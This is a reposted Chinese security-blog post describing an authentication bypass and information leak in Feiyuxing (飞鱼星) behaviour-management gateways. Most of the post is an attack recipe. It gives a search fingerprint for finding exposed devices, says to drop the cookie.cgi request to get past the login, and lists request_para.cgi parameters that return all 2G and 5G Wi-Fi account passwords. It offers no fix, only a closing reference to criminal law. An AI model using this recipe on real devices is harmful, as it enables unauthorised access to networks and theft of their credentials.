飞鱼星 智能上网行为管理系统 权限绕过+信息泄露漏洞

admin 2024年1月25日14:03:59评论44 views字数 419阅读1分23秒阅读模式

飞鱼星企业级智能无线上网行为管理系统以及众多产品存在权限绕过漏洞。

title="飞鱼星"

访问 index.html 或者 home/index.html 抓包,丢掉cookie.cgi就行了

飞鱼星 智能上网行为管理系统 权限绕过+信息泄露漏洞

飞鱼星 智能上网行为管理系统 权限绕过+信息泄露漏洞

越权成功后访问下面的地址还可以获取wifi账号密码

/request_para.cgi?parameter=wifi_info      #获取ALL WIFI账号密码/request_para.cgi?parameter=wifi_get_5g_host #获取5GWIFI账号密码/request_para.cgi?parameter=wifi_get_2g_host #获取2GWIFI账号密码
飞鱼星 智能上网行为管理系统 权限绕过+信息泄露漏洞

小知识

依据《刑法》第285条第3款的规定,犯提供非法侵入或者控制计算机信息系罪的,处3年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处3年以上7年以下有期徒刑,并处罚金。
飞鱼星 智能上网行为管理系统 权限绕过+信息泄露漏洞

声明

原文始发于微信公众号(丁永博的成长日记):飞鱼星 智能上网行为管理系统 权限绕过+信息泄露漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月25日14:03:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   飞鱼星 智能上网行为管理系统 权限绕过+信息泄露漏洞http://cn-sec.com/archives/2426586.html

发表评论

匿名网友 填写信息